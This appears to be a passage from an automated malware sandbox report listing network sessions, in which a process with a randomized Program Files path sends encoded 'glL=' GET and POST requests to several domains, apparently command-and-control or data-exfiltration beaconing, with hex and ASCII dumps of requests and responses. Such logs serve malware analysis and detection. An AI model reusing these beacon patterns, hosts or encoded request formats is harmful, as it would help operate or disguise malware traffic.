4f 6b 7a 47 51 66 66 79 49 48 36 4e 72 53 52 57 79 64 73 38 39 7a [TRUNCATED]
                                                            Data Ascii: glL=B7zPq0hPCGhnF1M9/sj0i+Ugv/GwBHEeHJ/8QT/L1SaWUgBBnIFWk3ncyEN2y4Qf564h8a8i1ybXlLTEyNULup1BYxs4GR9EQmMAMUkcdEm892/CjN+uq5RMaYV1uMCtBlgIK9Im6KnXdMGoYZy4Ga79d6MrcwwUZGC8iXwD4jp5CXfP9V75X3awizt2ueeeFsOQPlJBxu0mxg64wd0DRAothorGW3lBoCL5+LAeezKAAVmJ8ShY8qPtVEYevxaZpVVd4m9FkAKbVMYSud0I6kPgPXajjedHKrUjGeZCPTQD+CAeOr7szNo0OkzGQffyIH6NrSRWyds89zL8iZ4O1WEIPNrlb3ITToDVBpWjTupDScRIJKB2zjicsPUHdN8uIfK4DByK5K6fhQWZMPBl4VwKsLxErlstlkEGoiPjNQdRA0VSS5F9ghlLQuEm/FM47Yl/d6JMFxzXDbweQHNpF3bR8rG99mjqMdkuvVvyA6LJKGto6yKIY7DTjiivBJgaJpBft10M2eqcBbuUeDx8t8+5kSugxOdKhbzEnTp9iWmlqCQHvOu8cawQ01RS9FuRlhSkN/ShtNDx8rGu66xW+L6BTEwmmM0aZNjuF6z2ZKnH+rP8RoFirlO17cVm/deXTrc+6fbR5gX8a2uNfInCtEyGBJk5eBxXgCsVG4A+1ADi8Spr4k9nWFTHL+l2j0ty0zTRfuenqjGUOwaDcqTJnCr0eovQxh2OAX49lZo17OfY0XGbYOWw0Kd8R3ynwFwBYW/5u9M3lZqL3Wiy9/stjrOAG+zoplRpn8dehbfxLQLN1nVIIsX8JWSkVdOVGA099OLN4U6vaJBQ1aYqLQfiCsyvuXmDRVSnzOoXwLa9XMs/Sm6n+VIzAVyVM5cG+9Ag9cQgn/xlVQG/2btuUuREE+YXnoGTSL8vEcepT2betXDvhf/73KGWIBcvrLHFXv7X/yY6X1/+bH3ktag+NN13Z61SK659UADsCZrNpKHKabk3ZT9Y [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.550006202.95.11.110802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:04:59.744263887 CET566OUTGET /h075/?glL=M5bvpBBqdFhJI3dj4cnOi+0hxtX9G085UsP+X3mPywmFdAggjKtsm03AwUgw4dQv/vdP/KMVkiz+p77N0f0uhKMHc0BcakRvdnUpLgU+aD+qtEn9gsH1uJ0rHPAgqsfAdw==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.mirenzhibo.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:05:01.503808022 CET1236INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 16 Dec 2024 21:05:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 66 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 67 62 32 33 31 32 22 3e 3c 74 69 74 6c 65 3e 26 23 33 34 35 38 38 3b 26 23 33 31 31 36 38 3b 26 23 33 30 34 35 32 3b 26 23 32 35 37 37 33 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 39 32 35 36 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 34 31 37 39 3b 26 23 32 31 34 38 38 3b 5f 61 70 70 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 39 32 35 36 3b 26 23 32 36 34 31 32 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 32 33 34 33 33 3b 26 23 33 35 30 31 33 3b 5f 26 23 32 35 31 36 33 3b 26 23 32 36 34 32 36 3b 26 23 33 [TRUNCATED]
                                                            Data Ascii: ffc0<!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta charset="gb2312"><title>&#34588;&#31168;&#30452;&#25773;&#27704;&#20037;&#20813;&#36153;&#29256;&#19979;&#36733;&#24179;&#21488;_app&#26368;&#26032;&#29256;&#26412;&#20813;&#36153;&#19979;&#36733;&#23433;&#35013;_&#25163;&#26426;&#30452;&#25773;&#36719;&#20214;&#23433;&#21331;&#29256;&#19979;&#36733;</title><meta name="shenma-site-verification" content="2cc3f179526d8b55faf4b5ea962c450a_1578036476"><meta name="description" content="&#34588;&#31168;&#30452;&#25773;&#26159;&#19968;&#27454;&#22312;&#28145;&#22812;&#20026;&#22823;&#23478;&#25552;&#20379;&#31119;&#21033;&#30452;&#25773;&#30340;&#25163;&#26426;&#36719;&#20214;,&#22312;&#26202;&#19978;&#24456;&#22810;&#32769;&#21496;&#26426;&#26379;&#21451;&#37117;&#21916;&#27426;&#25171;&#24320;&#30452;&#25773;&#36719;&#20214;,&#30475;&#37027;&#20123;&#35753;&#20182;&#20204;&#24515;&#21160;&#30340;&#23567;&#22992;&#22992;,&#36825;&#27454;&#36 [TRUNCATED]
                                                            Dec 16, 2024 22:05:01.503987074 CET1236INData Raw: 3b 2c 26 23 32 33 34 32 37 3b 26 23 32 38 30 38 35 3b 26 23 33 30 34 32 32 3b 26 23 32 30 31 30 32 3b 26 23 32 30 38 34 30 3b 26 23 33 32 35 39 33 3b 26 23 33 30 33 34 30 3b 26 23 32 34 36 31 35 3b 26 23 32 34 38 36 33 3b 26 23 32 32 38 39 39 3b
                                                            Data Ascii: ;,&#23427;&#28085;&#30422;&#20102;&#20840;&#32593;&#30340;&#24615;&#24863;&#22899;&#20027;&#25773;&#34588;&#31168;&#30452;&#25773;"><meta name="keywords" content="&#34588;&#31168;&#30452;&#25773;,&#34588;&#31168;&#30452;&#25773;&#36719;&
                                                            Dec 16, 2024 22:05:01.503999949 CET1236INData Raw: 2c 20 73 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 75 61 20 3d 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61
                                                            Data Ascii: , s); })(); var ua = navigator.userAgent.toLowerCase(); var bIsIpad = ua.match(/ipad/i) == "ipad"; var bIsIphoneOs = ua.match(/iphone os/i) == "iphone os"||ua.match(/iphone; cpu os/i) == "iphone; cpu os";
                                                            Dec 16, 2024 22:05:01.504013062 CET1236INData Raw: 3e 3c 61 20 63 6c 61 73 73 3d 22 6d 66 37 36 61 30 20 6e 61 76 2d 6c 69 6e 6b 20 22 20 69 64 3d 27 73 65 72 76 69 63 65 27 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 72 65 6e 7a 68 69 62 6f 2e 6e 65 74 2f 74 6d 6a 2f 22 3e e5 ba
                                                            Data Ascii: ><a class="mf76a0 nav-link " id='service' href="http://www.mirenzhibo.net/tmj/"></a><a class="n9587b nav-link " href="http://www.mirenzhibo.net/i/"></a><a class="odca0f nav-link " href="http://www.mirenzhibo.net/bd/"></a><a
                                                            Dec 16, 2024 22:05:01.504024982 CET1236INData Raw: 3e 3c 2f 69 6e 73 3e 3c 73 6d 61 6c 6c 20 6c 61 6e 67 3d 22 37 36 37 34 61 38 22 3e 3c 2f 73 6d 61 6c 6c 3e 3c 64 69 76 20 6c 61 6e 67 3d 22 65 31 31 65 38 37 22 20 63 6c 61 73 73 3d 22 79 65 39 37 35 66 20 62 64 22 3e 3c 69 6d 67 20 64 72 61 67
                                                            Data Ascii: ></ins><small lang="7674a8"></small><div lang="e11e87" class="ye975f bd"><img draggable="f32825" class="z4757a pic" src="/game-img/image_488.jpg" alt=" v3.5.2"><sup draggable="6a9703"></sup><time dropzone="a0cd28"></time><tt date-time="deda2c
                                                            Dec 16, 2024 22:05:01.504035950 CET1236INData Raw: 3c 69 6d 67 20 64 72 61 67 67 61 62 6c 65 3d 22 39 35 38 37 62 35 22 20 73 72 63 3d 22 2f 74 65 6d 70 6c 61 74 65 2f 6e 65 77 73 2f 67 6f 2f 61 64 64 6f 6e 73 2f 63 6f 64 65 2f 32 30 32 33 31 31 30 39 30 32 34 37 30 36 38 35 38 2e 70 6e 67 22 20
                                                            Data Ascii: <img draggable="9587b5" src="/template/news/go/addons/code/20231109024706858.png" alt=""></li><li><img dropzone="dca0fc" src="/template/news/go/addons/code/20231109024706718.png" alt=""></li><li><img date-time="affcff" src="/templa
                                                            Dec 16, 2024 22:05:01.504048109 CET776INData Raw: e7 99 be e5 8f 98 e5 a3 b0 e4 bc 98 ef bc 9a f0 9f 92 b7 3c 2f 70 3e 3c 70 3e e3 80 80 e3 80 80 e8 af ad e9 9f b3 e7 9b b4 e6 92 ad ef bc 9a f0 9f 93 bc 3c 2f 70 3e 3c 68 33 20 63 6c 61 73 73 3d 22 6b 30 61 62 62 62 20 6d 67 22 3e e3 80 90 e5 ba
                                                            Data Ascii: </p><p></p><h3 class="k0abbb mg"></h3><p>1.</p><p>2.</p><p>3.</p><p>4.
                                                            Dec 16, 2024 22:05:01.504057884 CET1236INData Raw: 74 3e 3c 76 61 72 20 64 72 61 67 67 61 62 6c 65 3d 22 35 66 30 66 66 32 22 3e 3c 2f 76 61 72 3e 3c 61 72 65 61 20 64 72 6f 70 7a 6f 6e 65 3d 22 34 39 33 35 32 61 22 3e 3c 2f 61 72 65 61 3e 3c 64 69 76 20 64 61 74 65 2d 74 69 6d 65 3d 22 64 66 65
                                                            Data Ascii: t><var draggable="5f0ff2"></var><area dropzone="49352a"></area><div date-time="dfe4dd" class="ocb27e text-toggle" id="textShow"><i class="pc4e38 arrow-down"></i></div><map date-time="b0c124"></map><bdo dir="c77692"></bdo><dfn lang=
                                                            Dec 16, 2024 22:05:01.504069090 CET1236INData Raw: 5f 31 36 37 2e 6a 70 67 22 20 64 61 74 61 2d 73 72 63 3d 22 2f 67 61 6d 65 2d 69 6d 67 2f 69 6d 61 67 65 5f 34 31 34 2e 6a 70 67 22 20 20 61 6c 74 3d 22 e6 96 b0 e8 8c b6 e7 9b b4 e6 92 ad 61 70 70 e5 ae 98 e6 96 b9 e4 b8 8b e8 bd bd 22 3e 3c 74
                                                            Data Ascii: _167.jpg" data-src="/game-img/image_414.jpg" alt="app"><time draggable="946cb8"></time><tt dropzone="4c7195"></tt><var date-time="e05b21"></var><div lang="5ff2d9" class="aba2fa tit">app</div><ar
                                                            Dec 16, 2024 22:05:01.504081011 CET1236INData Raw: 3c 64 69 76 20 64 72 61 67 67 61 62 6c 65 3d 22 33 34 61 39 31 63 22 20 63 6c 61 73 73 3d 22 69 65 30 64 34 30 20 74 69 74 22 3e 56 31 31 e4 ba 9a e4 ba 8c e6 96 b0 e5 8c ba e4 b9 b1 e7 a0 81 e6 97 a0 e4 ba ba e5 8c ba 3c 2f 64 69 76 3e 3c 6d 61
                                                            Data Ascii: <div draggable="34a91c" class="ie0d40 tit">V11</div><map draggable="20a82c"></map><bdo dropzone="9a86da"></bdo><dfn date-time="65290c"></dfn><div dropzone="34394d" class="j68497 btn btn-link"></div></a></
                                                            Dec 16, 2024 22:05:01.623946905 CET1236INData Raw: 74 3e 3c 64 69 76 20 64 61 74 65 2d 74 69 6d 65 3d 22 63 62 32 37 65 61 22 20 63 6c 61 73 73 3d 22 72 33 65 31 31 37 20 62 74 6e 20 62 74 6e 2d 6c 69 6e 6b 22 3e e6 9f a5 e7 9c 8b e8 af a6 e6 83 85 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                            Data Ascii: t><div date-time="cb27ea" class="r3e117 btn btn-link"></div></a></li><li class="sdb8e4 item"><a href="http://wwk.xingyuzhibo.cc/"><img dir="c4e38a" class="te9f99 pic lazy" src="/game-img/image_417.jpg" data-src="/game-img/image_550


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.55000752.223.13.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:07.705513000 CET820OUTPOST /t927/ HTTP/1.1
                                                            Host: www.panavet.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.panavet.net
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.panavet.net/t927/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 34 43 38 2b 42 64 69 74 7a 65 67 4c 50 4c 4d 31 72 53 4e 54 48 48 62 61 38 6e 7a 57 2f 71 39 48 6b 2f 65 56 6e 4c 4a 34 6d 32 75 39 69 69 55 35 68 78 4c 56 52 6d 31 78 58 41 65 76 5a 34 53 53 62 72 58 49 54 63 35 6c 6b 73 6b 4c 48 4d 6f 79 32 52 75 30 67 69 58 75 63 53 79 4d 73 76 34 43 76 56 39 50 46 63 70 42 46 6d 71 61 67 69 2b 55 32 4a 6c 51 4a 4e 65 42 34 2f 2f 54 4a 6e 47 5a 4b 2f 31 4d 69 75 6d 34 6e 76 56 58 65 5a 62 54 6c 43 67 43 77 6a 58 32 35 47 6f 37 6f 64 67 38 36 70 42 2b 64 58 53 51 44 37 2f 52 43 32 75 67 39 4e 4f 55 47 33 4c 42 6a 77 58 6b 62 55 31 6c 44 75 54 36 4f 45 51 3d
                                                            Data Ascii: glL=4C8+BditzegLPLM1rSNTHHba8nzW/q9Hk/eVnLJ4m2u9iiU5hxLVRm1xXAevZ4SSbrXITc5lkskLHMoy2Ru0giXucSyMsv4CvV9PFcpBFmqagi+U2JlQJNeB4//TJnGZK/1Mium4nvVXeZbTlCgCwjX25Go7odg86pB+dXSQD7/RC2ug9NOUG3LBjwXkbU1lDuT6OEQ=
                                                            Dec 16, 2024 22:05:08.788245916 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.55000852.223.13.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:10.368881941 CET840OUTPOST /t927/ HTTP/1.1
                                                            Host: www.panavet.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.panavet.net
                                                            Content-Length: 224
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.panavet.net/t927/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 34 43 38 2b 42 64 69 74 7a 65 67 4c 4a 72 63 31 73 31 35 54 58 58 62 5a 67 33 7a 57 6d 36 39 44 6b 2f 53 56 6e 4f 70 6f 6d 6b 36 39 6a 44 6b 35 67 31 66 56 42 32 31 78 43 77 66 6c 58 59 53 4a 62 72 62 36 54 66 68 6c 6b 73 77 4c 48 4a 55 79 32 69 47 7a 69 79 58 77 56 79 79 4b 6f 76 34 43 76 56 39 50 46 63 39 2f 46 69 4f 61 67 57 36 55 31 73 4a 52 57 39 65 43 70 2f 2f 54 4e 6e 47 64 4b 2f 30 6a 69 72 47 53 6e 74 74 58 65 5a 4c 54 6c 54 67 64 36 6a 57 39 32 6d 70 31 6f 76 39 52 32 59 78 6f 51 46 65 58 43 4c 54 4a 4f 67 66 4b 6e 76 47 38 56 58 6e 35 7a 6a 66 54 4b 6b 55 4d 5a 4e 44 4b 51 54 45 42 65 70 30 42 31 46 4a 65 43 4e 65 6f 48 75 48 4e 37 30 30 42
                                                            Data Ascii: glL=4C8+BditzegLJrc1s15TXXbZg3zWm69Dk/SVnOpomk69jDk5g1fVB21xCwflXYSJbrb6TfhlkswLHJUy2iGziyXwVyyKov4CvV9PFc9/FiOagW6U1sJRW9eCp//TNnGdK/0jirGSnttXeZLTlTgd6jW92mp1ov9R2YxoQFeXCLTJOgfKnvG8VXn5zjfTKkUMZNDKQTEBep0B1FJeCNeoHuHN700B
                                                            Dec 16, 2024 22:05:11.482311010 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.55000952.223.13.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:13.033855915 CET1857OUTPOST /t927/ HTTP/1.1
                                                            Host: www.panavet.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.panavet.net
                                                            Content-Length: 1240
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.panavet.net/t927/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 34 43 38 2b 42 64 69 74 7a 65 67 4c 4a 72 63 31 73 31 35 54 58 58 62 5a 67 33 7a 57 6d 36 39 44 6b 2f 53 56 6e 4f 70 6f 6d 6b 69 39 69 78 63 35 67 53 6a 56 43 32 31 78 44 77 66 6b 58 59 54 4c 62 72 79 7a 54 59 6f 51 6b 76 49 4c 47 72 73 79 77 58 79 7a 6f 79 58 77 59 53 79 4c 73 76 34 62 76 56 4e 4c 46 63 74 2f 46 69 4f 61 67 58 4b 55 68 70 6c 52 46 74 65 42 34 2f 2f 68 4a 6e 47 6c 4b 2f 74 55 69 72 4b 6f 6d 63 4e 58 66 34 37 54 6d 68 49 64 79 6a 57 2f 7a 6d 6f 6f 6f 76 78 53 32 59 74 6b 51 48 2f 43 43 4b 6e 4a 4e 30 2b 78 39 50 61 54 41 6c 32 62 35 69 2f 39 61 43 6b 68 62 2f 4c 62 59 55 6b 42 54 49 55 75 38 52 4a 6b 47 75 62 69 55 66 62 6d 79 44 4a 4c 55 6f 45 50 66 75 56 61 42 5a 46 66 78 34 44 56 43 54 51 30 52 64 4d 44 59 63 44 45 6a 48 6a 34 56 6f 55 74 53 6c 65 62 70 6a 6f 51 33 53 64 74 74 58 63 73 4c 39 74 63 49 31 61 66 77 4e 41 67 50 50 75 61 79 5a 57 72 44 62 62 49 54 6d 54 34 68 70 50 7a 4a 38 53 4d 46 69 6a 35 49 39 58 32 36 45 73 41 50 4c 6a 57 4a 66 56 35 71 48 68 4d 57 30 [TRUNCATED]
                                                            Data Ascii: glL=4C8+BditzegLJrc1s15TXXbZg3zWm69Dk/SVnOpomki9ixc5gSjVC21xDwfkXYTLbryzTYoQkvILGrsywXyzoyXwYSyLsv4bvVNLFct/FiOagXKUhplRFteB4//hJnGlK/tUirKomcNXf47TmhIdyjW/zmooovxS2YtkQH/CCKnJN0+x9PaTAl2b5i/9aCkhb/LbYUkBTIUu8RJkGubiUfbmyDJLUoEPfuVaBZFfx4DVCTQ0RdMDYcDEjHj4VoUtSlebpjoQ3SdttXcsL9tcI1afwNAgPPuayZWrDbbITmT4hpPzJ8SMFij5I9X26EsAPLjWJfV5qHhMW0Nb6y2ZtkI4OQs/91JfuftpAfModWwKkWvcj9a2xmJUgayuUofMYVaR9WppT7FDllTyx0umoZ5byteeItcZIFAd/UVJ3YUKV6uVyji8Cwq8ehL/Nf+e3TcxO5xSvjju784VOV/2fN9+O9y2UJJosLSW5LC/TiPwXjWOahn0h6RBS5CU2PB9d7JW7HwsPUC5xQj9Ziq2K2E+VtsqZwB6F0n7vjMbbD2tPeXEcmZlvsBPoj00oiDrSJggHAbiuHXg+5Xuxil0sNyxC/Lg97e63aMQQLw+k1/RRyyys9HMbt+vqc2Xm46A15hLXZULtivgSlacnkp9pSeX6Q6Mj2dxSmWfP4zIj7TcdxQmO+KUtVDuDF9kemXFwanHvm+tG35w2c2mXzEN4bfNtyh7I2J/orKTRfZdeZBeK9xnQ14QjZpyPy4zNxJ/KqpvR3tRlKFr7Q1n7BkNuO887Tm0BAiwU5Rek4q09jcBWDMpBUmGeoCKP6GVTl2qKjkTz14tREH00EC8bQpBX2icwwXZ2wOixXhnHIOytF3zftyOFmaR4T9NP0nuITHY4IBIoz/snyNZV0qP70VuERhPUyHxLSbRJM0yif0a+PjDb5CP/PSUVvxxY6H58nfkmeqds+yIany4yZ/mXO26jlS3t40tutyib8gvSVJ7zOsyp6oI [TRUNCATED]
                                                            Dec 16, 2024 22:05:14.115259886 CET73INHTTP/1.1 405 Method Not Allowed
                                                            content-length: 0
                                                            connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            36192.168.2.55001052.223.13.41802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:15.690947056 CET563OUTGET /t927/?glL=1AUeCouptuEGP7RovDtARH/U/lHTmYtQpaOev7ZhwUeAiwA2sBfsbG9bB2esWamzUJ66A9MuqPgLEbs+7T22kSOzTS65ksENviFiIZVoUief+HuQlYMIDZa7g/mDFFXpJw==&UBE=olMPpNEHS HTTP/1.1
                                                            Host: www.panavet.net
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Dec 16, 2024 22:05:16.785666943 CET386INHTTP/1.1 200 OK
                                                            content-type: text/html
                                                            date: Mon, 16 Dec 2024 21:05:16 GMT
                                                            content-length: 265
                                                            connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 6c 4c 3d 31 41 55 65 43 6f 75 70 74 75 45 47 50 37 52 6f 76 44 74 41 52 48 2f 55 2f 6c 48 54 6d 59 74 51 70 61 4f 65 76 37 5a 68 77 55 65 41 69 77 41 32 73 42 66 73 62 47 39 62 42 32 65 73 57 61 6d 7a 55 4a 36 36 41 39 4d 75 71 50 67 4c 45 62 73 2b 37 54 32 32 6b 53 4f 7a 54 53 36 35 6b 73 45 4e 76 69 46 69 49 5a 56 6f 55 69 65 66 2b 48 75 51 6c 59 4d 49 44 5a 61 37 67 2f 6d 44 46 46 58 70 4a 77 3d 3d 26 55 42 45 3d 6f 6c 4d 50 70 4e 45 48 53 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?glL=1AUeCouptuEGP7RovDtARH/U/lHTmYtQpaOev7ZhwUeAiwA2sBfsbG9bB2esWamzUJ66A9MuqPgLEbs+7T22kSOzTS65ksENviFiIZVoUief+HuQlYMIDZa7g/mDFFXpJw==&UBE=olMPpNEHS"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            37192.168.2.550011199.59.243.227802704C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 16, 2024 22:05:22.436933994 CET820OUTPOST /ul4e/ HTTP/1.1
                                                            Host: www.sorket.tech
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US
                                                            Origin: http://www.sorket.tech
                                                            Content-Length: 204
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Connection: close
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.sorket.tech/ul4e/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N9005 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36
                                                            Data Raw: 67 6c 4c 3d 52 74 5a 45 68 44 39 6e 4f 38 71 42 67 66 69 53 35 47 33 70 75 56 64 44 6c 49 4b 49 59 4a 34 54 38 37 70 73 32 67 73 72 65 69 67 32 44 46 38 72 73 36 57 76 65 44 32 52 74 61 50 55 73 62 34 6d 68 4c 70 52 2b 5a 48 38 70 67 4a 2f 45 65 58 53 34 58 47 6a 44 4f 69 7a 5a 65 43 2b 35 31 4e 4f 55 61 71 71 35 6a 6a 61 71 74 69 67 79 7a 67 76 64 79 33 43 69 42 54 45 74 6f 63 30 55 64 66 75 6b 4c 56 65 6a 4b 6c 43 68 6a 31 41 77 69 67 6e 33 6a 2b 38 78 47 33 70 42 77 63 64 65 6b 35 4a 63 75 47 55 73 53 48 56 50 39 30 49 50 6f 4f 73 2b 5a 67 50 66 70 61 47 50 56 67 4c 65 74 6d 71 37 2b 43 61 4a 43 77 3d
                                                            Data Ascii: glL=RtZEhD9nO8qBgfiS5G3puVdDlIKIYJ4T87ps2gsreig2DF8rs6WveD2RtaPUsb4mhLpR+ZH8pgJ/EeXS4XGjDOizZeC+51NOUaqq5jjaqtigyzgvdy3CiBTEtoc0UdfukLVejKlChj1Awign3j+8xG3pBwcdek5JcuGUsSHVP90IPoOs+ZgPfpaGPVgLetmq7+CaJCw=
                                                            Dec 16, 2024 22:05:23.519185066 CET1236INHTTP/1.1 200 OK
                                                            date: Mon, 16 Dec 2024 21:05:22 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 1110
                                                            x-request-id: 41b85f74-36a4-4870-9fa6-606120b64a7c
                                                            cache-control: no-store, max-age=0
                                                            accept-ch: sec-ch-prefers-color-scheme
                                                            critical-ch: sec-ch-prefers-color-scheme
                                                            vary: sec-ch-prefers-color-scheme
                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_nBboe6+elNZYYmR0t3wY95BrV833T6lSW67hybGrSSaE9c33fANGLtdsHNv996GvuB1V+fmZ49vXgU/Ax1RvdA==
                                                            set-cookie: parking_session=41b85f74-36a4-4870-9fa6-606120b64a7c; expires=Mon, 16 Dec 2024 21:20:23 GMT; path=/
                                                            connection: close
